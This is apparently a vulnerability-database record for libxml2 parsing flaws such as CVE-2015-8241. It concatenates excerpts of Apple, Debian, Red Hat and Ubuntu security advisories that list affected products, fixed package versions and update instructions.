Hopkins University\n\nSecurity\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the ASN.1 decoder. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2016-1950 : Francis Gabriel of Quarkslab\n\nsyslog\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1722 : Joshua J. Drake and Nikias Bassen of Zimperium zLabs\n\nTrueTypeScaler\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2016-1775 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nWebKit\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1723 : Apple\nCVE-2016-1724 : Apple\nCVE-2016-1725 : Apple\nCVE-2016-1726 : Apple\nCVE-2016-1727 : Apple\n\nWi-Fi\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription: A frame validation and memory corruption issue existed\nfor a given ethertype. This issue was addressed through additional\nethertype validation and improved memory handling. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 2.8.0+dfsg1-7+wheezy5. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.9.1+dfsg1-5+deb8u1. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2.9.3+dfsg1-1 or earlier versions. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.3+dfsg1-1 or earlier versions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: libxml2 security update\nAdvisory ID: RHSA-2015:2550-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2550.html\nIssue date: 2015-12-07\nCVE Names: CVE-2015-1819 CVE-2015-5312 CVE-2015-7497 \n CVE-2015-7498 CVE-2015-7499 CVE-2015-7500 \n CVE-2015-7941 CVE-2015-7942 CVE-2015-8241 \n CVE-2015-8242 CVE-2015-8317 \n=====================================================================\n\n1. Summary:\n\nUpdated libxml2 packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. \n\nSeveral denial of service flaws were found in libxml2, a library providing\nsupport for reading, modifying, and writing XML and HTML files. A remote\nattacker could provide a specially crafted XML or HTML file that, when\nprocessed by an application using libxml2, would cause that application to\nuse an excessive amount of CPU, leak potentially sensitive information, or\nin certain cases crash the application. (CVE-2015-1819, CVE-2015-5312,\nCVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500 CVE-2015-7941,\nCVE-2015-7942, CVE-2015-8241, CVE-2015-8242, CVE-2015-8317, BZ#1213957,\nBZ#1281955)\n\nRed Hat would like to thank the GNOME project for reporting CVE-2015-7497,\nCVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-8241, CVE-2015-8242,\nand CVE-2015-8317. Upstream acknowledges Kostya Serebryany of Google as the\noriginal reporter of CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, and\nCVE-2015-7500; Hugh Davenport as the original reporter of CVE-2015-8241 and\nCVE-2015-8242; and Hanno Boeck as the original reporter of CVE-2015-8317. \nThe CVE-2015-1819 issue was discovered by Florian Weimer of Red Hat\nProduct Security. \n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct these issues. The desktop must be\nrestarted (log out, then log back in) for this update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1211278 - CVE-2015-1819 libxml2: denial of service processing a crafted XML document\n1213957 - libxml2: out-of-bounds memory access when parsing an unclosed HTML comment\n1274222 - CVE-2015-7941 libxml2: Out-of-bounds memory access\n1276297 - CVE-2015-7942 libxml2: heap-based buffer overflow in xmlParseConditionalSections()\n1276693 - CVE-2015-5312 libxml2: CPU exhaustion when processing specially crafted XML input\n1281862 - CVE-2015-7497 libxml2: Heap-based buffer overflow in xmlDictComputeFastQKey\n1281879 - CVE-2015-7498 libxml2: Heap-based buffer overflow in xmlParseXmlDecl\n1281925 - CVE-2015-7499 libxml2: Heap-based buffer overflow in xmlGROW\n1281930 - CVE-2015-8317 libxml2: Out-of-bounds heap read when parsing file with unfinished xml declaration\n1281936 - CVE-2015-8241 libxml2: Buffer overread with XML parser in xmlNextChar\n1281943 - CVE-2015-7500 libxml2: Heap buffer overflow in xmlParseMisc\n1281950 - CVE-2015-8242 libxml2: Buffer overread with HTML parser in push mode in xmlSAX2TextNode\n1281955 - libxml2: Multiple out-of-bounds reads in xmlDictComputeFastKey.isra.2 and xmlDictAddString.isra.O\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\naarch64:\nlibxml2-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.aarch64.rpm\n\nppc64:\nlibxml2-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.ppc64.rpm\n\nppc64le:\nlibxml2-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-python-2.9.1-6.el7_2.2.ppc64le.rpm\n\ns390x:\nlibxml2-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-python-2.9.1-6.el7_2.2.s390x.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\naarch64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.aarch64.rpm\n\nppc64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-static-2.9.1-6.el7_2.2.ppc64.rpm\n\nppc64le:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-static-2.9.1-6.el7_2.2.ppc64le.rpm\n\ns390x:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-static-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-static-2.9.1-6.el7_2.2.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-1819\nhttps://access.redhat.com/security/cve/CVE-2015-5312\nhttps://access.redhat.com/security/cve/CVE-2015-7497\nhttps://access.redhat.com/security/cve/CVE-2015-7498\nhttps://access.redhat.com/security/cve/CVE-2015-7499\nhttps://access.redhat.com/security/cve/CVE-2015-7500\nhttps://access.redhat.com/security/cve/CVE-2015-7941\nhttps://access.redhat.com/security/cve/CVE-2015-7942\nhttps://access.redhat.com/security/cve/CVE-2015-8241\nhttps://access.redhat.com/security/cve/CVE-2015-8242\nhttps://access.redhat.com/security/cve/CVE-2015-8317\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWZZK6XlSAg2UNWIIRAlx5AKCfIxP9TLM+V/vmQq6MVeUpjiGltgCgnOgZ\nIOmptwborGrgz5fLqra3STg=\n=bVgd\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. 6) - i386, x86_64\n\n3. ============================================================================\nUbuntu Security Notice USN-2834-1\nDecember 14, 2015\n\nlibxml2 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nlibxml2 could be made to crash if it opened a specially crafted file. (CVE-2015-5312,\nCVE-2015-7497, CVE-2015-7498, CVE-2015-7499,CVE-2015-7500)\n\nHugh Davenport discovered that libxml2 incorrectly handled certain\nmalformed documents. (CVE-2015-8241,\nCVE-2015-8242)\n\nHanno Boeck discovered that libxml2 incorrectly handled certain\nmalformed documents. This issue only applied\nto Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-8317)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n libxml2 2.9.2+zdfsg1-4ubuntu0.2\n\nUbuntu 15.04:\n libxml2 2.9.2+dfsg1-3ubuntu0.2\n\nUbuntu 14.04 LTS:\n libxml2 2.9.1+dfsg1-3ubuntu4.6\n\nUbuntu 12.04 LTS:\n libxml2 2.7.8.dfsg-5.1ubuntu4.13\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes",
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VAR-201603-0222
Vulnerability from variot - Updated: 2026-04-10 23:16The xmlNextChar function in libxml2 before 2.9.4 allows remote attackers to cause a denial of service (heap-based buffer over-read) via a crafted XML document. libxml2 is prone to multiple memory-corruption vulnerabilities. A remote attacker can leverage these issues to execute arbitrary code in the context of the user running the application. Failed exploit attempts may result in a denial-of-service condition. Apple iOS, OS X, Safari, tvOS and watchOS are all products of Apple Inc. in the United States. Apple iOS is a set of operating systems developed for mobile devices; Apple OS X is a set of dedicated operating systems developed for Mac computers; and the default browser that comes with the iOS operating system; tvOS is a smart TV operating system; watchOS is a smart watch operating system. A security vulnerability exists in libxml2 of several Apple products. The following products and versions are affected: Apple iOS versions prior to 9.3, OS X versions prior to 10.11.4, Safari versions prior to 9.1, tvOS versions prior to 9.2, and watchOS versions prior to 2.2. Summary:
An update for libxml2 is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The libxml2 library is a development toolbox providing the implementation of various XML standards. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449)
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all applications linked to the libxml2 library must be restarted, or the system rebooted.
- Package List:
Red Hat Enterprise Linux HPC Node (v. 6):
Source: libxml2-2.7.6-21.el6_8.1.src.rpm
x86_64: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-2.7.6-21.el6_8.1.x86_64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-python-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm libxml2-static-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: libxml2-2.7.6-21.el6_8.1.src.rpm
i386: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-python-2.7.6-21.el6_8.1.i686.rpm
ppc64: libxml2-2.7.6-21.el6_8.1.ppc.rpm libxml2-2.7.6-21.el6_8.1.ppc64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.ppc.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm libxml2-devel-2.7.6-21.el6_8.1.ppc.rpm libxml2-devel-2.7.6-21.el6_8.1.ppc64.rpm libxml2-python-2.7.6-21.el6_8.1.ppc64.rpm
s390x: libxml2-2.7.6-21.el6_8.1.s390.rpm libxml2-2.7.6-21.el6_8.1.s390x.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.s390.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm libxml2-devel-2.7.6-21.el6_8.1.s390.rpm libxml2-devel-2.7.6-21.el6_8.1.s390x.rpm libxml2-python-2.7.6-21.el6_8.1.s390x.rpm
x86_64: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-2.7.6-21.el6_8.1.x86_64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm libxml2-python-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-static-2.7.6-21.el6_8.1.i686.rpm
ppc64: libxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm libxml2-static-2.7.6-21.el6_8.1.ppc64.rpm
s390x: libxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm libxml2-static-2.7.6-21.el6_8.1.s390x.rpm
x86_64: libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-static-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: libxml2-2.7.6-21.el6_8.1.src.rpm
i386: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-python-2.7.6-21.el6_8.1.i686.rpm
x86_64: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-2.7.6-21.el6_8.1.x86_64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm libxml2-python-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-static-2.7.6-21.el6_8.1.i686.rpm
x86_64: libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-static-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: libxml2-2.9.1-6.el7_2.3.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: libxml2-2.9.1-6.el7_2.3.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: libxml2-2.9.1-6.el7_2.3.src.rpm
ppc64: libxml2-2.9.1-6.el7_2.3.ppc.rpm libxml2-2.9.1-6.el7_2.3.ppc64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm libxml2-devel-2.9.1-6.el7_2.3.ppc.rpm libxml2-devel-2.9.1-6.el7_2.3.ppc64.rpm libxml2-python-2.9.1-6.el7_2.3.ppc64.rpm
ppc64le: libxml2-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-devel-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-python-2.9.1-6.el7_2.3.ppc64le.rpm
s390x: libxml2-2.9.1-6.el7_2.3.s390.rpm libxml2-2.9.1-6.el7_2.3.s390x.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm libxml2-devel-2.9.1-6.el7_2.3.s390.rpm libxml2-devel-2.9.1-6.el7_2.3.s390x.rpm libxml2-python-2.9.1-6.el7_2.3.s390x.rpm
x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: libxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm libxml2-static-2.9.1-6.el7_2.3.ppc.rpm libxml2-static-2.9.1-6.el7_2.3.ppc64.rpm
ppc64le: libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-static-2.9.1-6.el7_2.3.ppc64le.rpm
s390x: libxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm libxml2-static-2.9.1-6.el7_2.3.s390.rpm libxml2-static-2.9.1-6.el7_2.3.s390x.rpm
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: libxml2-2.9.1-6.el7_2.3.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-1762 https://access.redhat.com/security/cve/CVE-2016-1833 https://access.redhat.com/security/cve/CVE-2016-1834 https://access.redhat.com/security/cve/CVE-2016-1835 https://access.redhat.com/security/cve/CVE-2016-1836 https://access.redhat.com/security/cve/CVE-2016-1837 https://access.redhat.com/security/cve/CVE-2016-1838 https://access.redhat.com/security/cve/CVE-2016-1839 https://access.redhat.com/security/cve/CVE-2016-1840 https://access.redhat.com/security/cve/CVE-2016-3627 https://access.redhat.com/security/cve/CVE-2016-3705 https://access.redhat.com/security/cve/CVE-2016-4447 https://access.redhat.com/security/cve/CVE-2016-4448 https://access.redhat.com/security/cve/CVE-2016-4449 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFXa8B8XlSAg2UNWIIRAh9ZAJ99xgPhOaIopIxmynm+vlDcmw4jFACeLvTm ZsVLEgJAF0Zt6xZVzqvVW7U= =fREV -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . From: Marc Deslauriers marc.deslauriers@canonical.com Reply-To: Ubuntu Security security@ubuntu.com To: ubuntu-security-announce@lists.ubuntu.com Message-ID: 5755B7E3.5040103@canonical.com Subject: [USN-2994-1] libxml2 vulnerabilities
============================================================================ Ubuntu Security Notice USN-2994-1 June 06, 2016
libxml2 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 15.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in libxml2. (CVE-2015-8806, CVE-2016-2073, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447)
It was discovered that libxml2 incorrectly handled certain malformed documents. (CVE-2016-1762, CVE-2016-1834)
Mateusz Jurczyk discovered that libxml2 incorrectly handled certain malformed documents. (CVE-2016-1833, CVE-2016-1838, CVE-2016-1839)
Wei Lei and Liu Yang discovered that libxml2 incorrectly handled certain malformed documents. (CVE-2016-1835, CVE-2016-1837)
Wei Lei and Liu Yang discovered that libxml2 incorrectly handled certain malformed documents. This issue only applied to Ubuntu 14.04 LTS, Ubuntu 15.10 and Ubuntu 16.04 LTS. (CVE-2016-1836)
Kostya Serebryany discovered that libxml2 incorrectly handled certain malformed documents. (CVE-2016-1840)
